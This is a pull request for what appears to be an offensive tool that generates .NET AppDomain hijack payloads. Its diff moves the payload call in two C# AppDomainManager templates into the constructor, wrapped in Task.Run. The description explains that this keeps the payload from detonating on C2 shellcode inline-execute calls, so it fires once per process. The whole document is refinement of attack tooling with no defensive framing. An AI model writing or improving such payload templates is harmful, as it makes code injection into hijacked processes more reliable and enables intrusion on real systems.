### PR TITLE
Fixed C2 inline-execute functionality

### DIFF
--- a/AutoDomainHijack.nimble
+++ b/AutoDomainHijack.nimble
@@ -1,11 +1,11 @@
 # Package
-version       = "1.0.0"
-author        = "nbaertsch"
-description   = "Automated .NET AppDomain hijack payload generation"
-license       = "GPL-3.0"
-srcDir        = "src"
-binDir        = "bin"
-bin           = @["AutoDomainHijack, HijackHunt"]
+version = "1.0.0"
+author = "nbaertsch"
+description = "Automated .NET AppDomain hijack payload generation"
+license = "GPL-3.0"
+srcDir = "src"
+binDir = "bin"
+bin = @["AutoDomainHijack, HijackHunt"]
 
 
 # Dependencies

--- a/templates/hijacker-embedded-pic.mustache
+++ b/templates/hijacker-embedded-pic.mustache
@@ -9,9 +9,12 @@ using System.Text;
 public sealed class {{ managerType }} :  AppDomainManager
 {
 
-    public override void InitializeNewDomain(AppDomainSetup appDomaininfo)
+    public {{ managerType }}()
     {
-        {{class_Helper}}.{{func_Run}}();
+        var t = Task.Run(() =>
+            {{class_Helper}}.{{func_Run}}()
+        );
+        t.Wait();
         return;
     }
 

--- a/templates/hijacker-remote-pic.mustache
+++ b/templates/hijacker-remote-pic.mustache
@@ -9,7 +9,7 @@ using System.Text;
 public sealed class {{ managerType }} :  AppDomainManager
 {
 
-    public override void InitializeNewDomain(AppDomainSetup appDomaininfo)
+    public {{ managerType }}()
     {
         var t = Task.Run(() =>
             {{class_Helper}}.{{func_Run}}()


### PR DESCRIPTION
Moved payload execution to the app domain constructor to avoid detonation on inline-execute calls from C2 shellcode. Payload now correctly detonates only once per process.